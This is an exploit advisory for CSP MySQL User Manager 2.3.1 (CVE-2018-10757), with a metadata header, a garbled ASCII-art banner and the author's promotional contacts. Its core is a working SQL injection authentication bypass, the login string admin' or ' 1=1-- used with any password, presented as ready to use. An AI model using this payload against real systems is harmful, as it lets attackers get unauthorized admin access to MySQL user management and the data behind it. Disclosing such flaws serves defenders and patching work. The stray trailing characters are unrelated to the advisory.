# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass # Date: 2018-05-04 # Exploit Author: Youssef mami # Vendor Homepage: https://code.google.com/archive/p/cspmum/ # Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip # Version: 2.3.1 # Tested on: Linux 2.6.38-11 # CVE : CVE-2018-10757 ################################################################################## .____ ||__ __________ _____ __________ _____/|_ ||\\__\/ \ / \\__\/ \_/ __ \ __\ | Y\/ __ \|Y Y\Y Y\/ __ \|Y Y\___/|| |___|(____/__|_|/__|_|(____/__|_|/\___>__| \/ \/\/\/ \/\/ \/ ._________.__ |__| _____/ ____\________________ _____ _/|_|__| ________ __ ____ ||/\ __\/_ \___ \/ \\__\\ __\|/ ____/|\_/ __ \ || |\| (<_> )| \/Y Y\/ __ \|| |< <_|||/\___/ |__|___|/__|\____/|__||__|_|(____/__| |__|\__ |____/\___> \/\/ \/|__| \/ .__ ______ _______________|__| ________ ______ /___// __ \___ \\/ /|/ ___\/ __ \ /___/ \___ \\___/|| \/\ /|\\__\___/ \___ \ /____>\___>__|\_/ |__|\___>___>____> \/ \/\/\/ \/ ################################################################################## SQL Injection Authentication Bypass Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip Author(Pentester): Youssef mami (contact@hammamet-services.com) On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog ) On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info ################################################################################## we just need to input admin login like this : admin' or ' 1=1-- and any password :-) login : admin' or ' 1=1-- password: hammamet informatique services
体验盒子
